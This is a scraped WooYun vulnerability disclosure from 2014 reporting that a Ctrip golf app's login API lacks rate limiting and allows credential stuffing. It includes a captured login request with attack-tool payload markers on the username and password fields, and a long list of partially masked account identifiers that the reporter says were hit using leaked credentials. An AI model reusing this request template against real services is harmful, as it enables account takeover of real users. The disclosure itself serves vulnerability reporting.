携程某客户端接口缺陷可撞库 | wooyun-2014-076667| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076667

漏洞标题：携程某客户端接口缺陷可撞库

漏洞作者：路人甲

提交时间：2014-09-19 21:27

修复时间：2014-11-08 22:40

公开时间：2014-11-08 22:40

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-19：该漏洞正等待厂商内部评估
2014-09-19：厂商已经确认，与白帽子共同解决该漏洞中，漏洞信息仅向厂商公开
2014-10-09：细节向核心白帽子及相关领域专家公开
2014-10-19：细节向普通白帽子公开
2014-10-29：细节向实习白帽子公开
2014-11-08：细节向公众公开

简要描述：

大量用户密码可被猜解

详细说明：

问题APP：爱玩高尔夫
登陆接口未验证可进行撞库攻击，导致大量用户密码泄露。
登陆时电脑抓包：

POST /restapi/fun-golf-mobile/v1/users/login HTTP/1.1
Host: sec-m.ctrip.com
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 192
Content-Type: application/json; charset=utf-8
Accept-Language: zh-Hans;q=1, en;q=0.9, fr;q=0.8, de;q=0.7, zh-Hant;q=0.6, ja;q=0.5
Cookie: NSC_WT_Tfd-n_443=ffffffff0900100a45525d5f4f58455e445a4a4216cb
Connection: keep-alive
User-Agent: CTTheme_Golf/5.1.0.8 (iPhone; iOS 7.1.2; Scale/2.00)
{"deviceID":"|020000000000|iPhone 4|Apple|7.1.2|WiFi|322DE878-2D0E-436D-B94C-CAF297A65398","password":"§123123§","loginName":"§Aaaaa§","terminalType":2,"useVersion":"5.1.0","osVersion":"iPhone 4"}

使用互联网泄露的大量用户数据进行测试
仅测试一部分数据，成功率非常之高。

漏洞证明：

贴一部分数据



mask 区域

*****wkw@16*****
*****jscut@*****
*****orpaa@*****
*****0322@1*****
*****clmql@*****
*****w80@16*****
*****wy_zb@1*****
*****xuan@q*****
*****c195@q*****
*****500593*****
*****427666*****
*****lty3@s*****
*****508988@*****
*****ncck@1*****
*****8024093*****
*****yfhh@1*****
*****ysunny*****
*****ingbo52*****
*****8362051*****
*****437935@*****
*****175782*****
*****51239@1*****
*****582904*****
*****855007*****
*****yiran@1*****
*****diyan@g*****
*****g1996@1*****
*****l602418*****
*****m298802*****
*****aoniao@*****
*****kidd@si*****
*****aotangq*****
*****26075114*****
*****884013*****
*****7732962*****
*****etwell*****
*****777078*****
*****peter@1*****
*****rt168@s*****
*****pei.ok@*****
*****121864@*****
*****1902952*****
*****ycan@g*****
*****5380610*****
*****7027512*****
*****7012240*****
*****379233*****
*****841403*****
*****y86@vi*****
*****355339*****
*****2240240*****
*****018972*****
*****646160*****
*****3448308*****
*****gxin@1*****
*****ybit@1*****
*****2221986@*****
*****iyiruby*****
*****nshan11*****
*****gkun_cs@*****
*****nddy@fo*****
*****z_jxxz@*****
*****lo1987@*****
*****jingyc*****
*****jiaduoji*****
*****mecai@g*****
*****xinray*****
*****el1989@*****
*****dy0127@*****
*****enolive*****
*****n46@16*****
*****rkingwl*****
*****y_guan@*****
*****hulie@s*****
*****ikano@*****
*****yunping@*****
*****ppyza@*****
*****gsifeng*****
*****veavmil*****
*****g5901@*****
*****iweiyd*****
*****uang9332*****
*****zhai@vi*****
*****003014*****
*****557979*****
*****iunuan*****
*****rahua@s*****
*****anas@si*****
*****olife@vi*****
*****anlaha@*****
*****60503@*****
*****390513@*****
*****sley@1*****
*****iental*****
*****naa1234@*****
*****ding@si*****
*****gt@yaho*****
*****cong666*****
*****y.bupt@*****
*****gduluoya*****
*****tcabcd@s*****
*****606661@*****
*****guoping1*****
*****fhbzh@1*****
*****52774570*****
*****ny0203@*****
*****ntaoeas*****
*****wq3@16*****
*****mgb@to*****
*****ang1596@*****
*****544033@*****
*****enjia01@*****
*****zxhlsl*****
*****xin1342*****
*****hl1229@*****
*****chun481*****
*****g19850202*****
*****018973*****
*****ita@hotm*****
*****s128@1*****
*****ang621@*****
*****syyz01*****
*****	tveht*****
*****3553@1*****
*****yi_t007@*****
*****bzqh@1*****
*****ngzj@g*****
*****oliday@y*****
*****jq2004*****
*****ayors@fo*****
*****milich@s*****
*****ing_betty*****
*****g1025@hot*****
*****yxm@hotm*****
*****888196@*****
*****091259*****
*****here@gm*****
*****092496*****
*****86697@*****
*****k_827@*****
*****ui@huaw*****
*****055953@*****
*****50111@*****
*****nkai@yaho*****
*****w2004_zx*****
*****c@hotma*****
*****07515@*****
*****4854421*****
*****elix970*****
*****lhappy@s*****
*****wosawo*****
*****1246@hot*****
*****ng1118@s*****
*****ue198911*****
*****rcxchy@*****
*****648813@*****
*****st-fan@*****
*****nggook3*****
*****86226@1*****
*****10957909*****
*****en922@s*****
*****2040246*****
*****nal118@*****
*****hx2003*****
*****knot955*****
*****ope.forev*****
*****xlord@1*****
*****gzhang@ho*****
*****ntong007*****
*****gszwqxy*****
*****yun03206*****
*****y@dhc.*****
*****5124113*****
*****in@hotm*****
*****gengy@*****
*****x_love@*****
*****sunlihu*****
*****8824@vi*****
*****a514@vi*****
*****4504721*****
*****gsong@y*****
*****jfish@*****
*****yt.1320*****
*****hui_zhan*****
*****z-1987@*****
*****ow0034@s*****
*****_sun888@h*****
*****d53@hotm*****
*****yjdm75*****
*****620438@*****
*****g2873921*****
*****_ww520@*****
*****g_wang@ya*****
*****michael@*****
*****te_david*****
*****23@163*****
*****ing1@hot*****
*****5355@gm*****
*****1986021*****
*****g2006.7@*****
*****grx@yaho*****
*****anshen@*****
*****lvin@ho*****
*****556179@*****
*****xzml1739*****
*****esys@2*****
*****75451317*****
*****xiaobei*****
*****free@1*****
*****epeng@s*****
*****edcloud*****
*****aijie1@*****
*****8041418@*****
*****jing905@*****
*****ow9997@*****
*****nfield@g*****
*****ng0311@g*****
*****tian_123@*****
*****opaoys*****
*****ong_7268*****
*****5081451*****
*****ngpippo*****
*****econst@h*****
*****qing_sup*****
*****meng@gm*****
*****697094@*****
*****842125@*****
*****ngxihua@g*****
*****fzcrb@y*****
*****_jiangfei*****
*****p0510@*****
*****rus@12*****
*****side7210*****
*****9040137*****
*****860607@*****
*****gw1982@*****
*****l@netea*****
*****ngejia@*****
*****yxy@hotm*****
*****hang66728*****
*****atzhoul*****
*****longchan*****
*****x0622@ho*****
*****200811@*****
*****jby@16*****
*****huojia@s*****
*****xh_tao@h*****
*****xiwei@1*****
*****ai1986@*****
*****awy@16*****
*****g7503@ya*****
*****uohangyi*****
*****er22@yah*****
*****706224*****
*****00618020*****
*****646442@*****
*****71296@*****
*****ancaosnow*****
*****m.shh@*****
*****x_dread*****
*****aancn@*****
*****ao@ncep*****
*****	wfits*****
*****t-19@1*****
*****osou@1*****
*****ftware@*****
*****595764*****
*****dycate@*****
*****yycdz@*****
*****898897*****
*****08@vip.s*****
*****xb126@1*****
*****n2007lm*****
*****yt1010@*****
*****z890717@*****
*****song137@*****
*****1982902*****
*****feng1988*****
*****qg1997@*****
*****5902937*****
*****uozi8@*****
*****5697@yaho*****
*****yu@hotm*****
*****ael0315*****
*****nlly@s*****
*****ing1987@*****
*****yunzhuiyu*****
*****y_zheng*****
*****7708992*****
*****lygfj@*****
*****aoye@ya*****
*****y.min@g*****
*****y_589@*****
*****njun0259*****
*****ngliang*****
*****ergeanl*****
*****hen@wi*****
*****yuan1860@*****
*****ims2009*****
*****aiwang@*****
*****ua_cheng*****
*****y0428@*****
*****n0818@1*****
*****enzhou@*****

随机登陆下

修复方案：

对登录接口进行限制吧！

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-09-19 22:39

厂商回复：

漏洞已确认真实存在，并已安排人处理。

漏洞评价：

2014-11-09 01:50 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | 未满18周岁,不准进入.)

哇.撞库3个美刀.
2014-11-09 02:03 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

...有点给力，是600块钱？
2014-11-09 07:57 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

@大白菜。。这是5000
2014-11-09 10:34 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了，也来挖挖漏洞，为创建安全...)

@′雨。哇哇~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076667

漏洞标题：携程某客户端接口缺陷可撞库

相关厂商：携程旅行网

漏洞作者：路人甲

提交时间：2014-09-19 21:27

修复时间：2014-11-08 22:40

公开时间：2014-11-08 22:40

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076667

漏洞标题：携程某客户端接口缺陷可撞库

相关厂商：携程旅行网

漏洞作者： 路人甲

提交时间：2014-09-19 21:27

修复时间：2014-11-08 22:40

公开时间：2014-11-08 22:40

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-076667"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云